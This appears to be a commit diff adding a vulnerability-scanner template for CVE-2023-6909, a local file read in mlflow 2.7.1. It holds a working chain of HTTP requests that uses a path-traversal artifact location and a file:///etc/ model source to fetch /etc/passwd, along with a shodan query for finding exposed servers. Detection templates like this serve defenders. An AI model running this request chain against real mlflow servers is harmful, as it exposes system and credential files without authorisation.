Added CVE-2023-6909.yaml Template

2024-02-02 19:20:55 +09:00 · 2024-02-02 19:20:55 +09:00 · 4416534363
parent b686b1aea2
commit 4416534363
1 changed files with 93 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-6909.yaml
+++ b/http/cves/2023/CVE-2023-6909.yaml
@ -0,0 +1,93 @@
+id: CVE-2023-6909
+
+info:
+  name: mlflow - Local File Read
+  author: Hyunsoo-ds
+  severity: critical
+  description: |
+    Local File Read due to URI parsing confusion in mlflow on version 2.7.1
+  impact: |
+    Successful exploitation could be lead to disclose of sensitive information such as SSH Keys or Internal configurations.
+  remediation: |
+    To fix this vulnerability, it is important to update the miflow package to the latest version more than 2.7.1.
+  reference:
+    - https://huntr.com/bounties/11209efb-0f84-482f-add0-587ea6b7e850/
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-6909
+    - https://github.com/mlflow/mlflow/commit/1da75dfcecd4d169e34809ade55748384e8af6c1
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N
+    cvss-score: 9.3
+    cve-id: CVE-2023-6909
+    cwe-id: CWE-29
+  metadata:
+    verified: true
+    vendor: lfprojects
+    product: mlflow
+    shodan-query: http.title:"mlflow"
+  tags: mlflow, lfi, cve, cve2023, lfprojects, ai
+
+
+http:
+  - raw:
+    - |
+      POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1
+      Host: {{Hostname}}
+      
+      {"name" : "{{randstr}}", "artifact_location": "http:///?/../../../../../../../../../../../../../../etc/"}
+
+    - |
+      POST /api/2.0/mlflow/runs/create HTTP/1.1
+      Host: {{Hostname}}
+
+      {"experiment_id": "{{EXPERIMENT_ID}}"}
+
+    - |
+      POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
+      Host: {{Hostname}}
+
+      {"name": "{{randstr}}"}
+
+    - |
+      POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
+      Host: {{Hostname}}
+
+      {"name" : "{{randstr}}", "run_id": "{{RUN_ID}}", "source" : "file:///etc/"}
+
+    - |
+      GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version=1 HTTP/1.1
+      Host: {{Hostname}}
+    
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: word
+        part: header_5
+        words:
+          - "filename=passwd"
+          - "application/octet-stream"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: json
+        part: body_1
+        name: EXPERIMENT_ID
+        group: 1
+        json:
+          - '.experiment_id'
+        internal: true
+
+      - type: json
+        part: body_2
+        name: RUN_ID
+        group: 1
+        json:
+          - '.run.info.run_id'
+        internal: true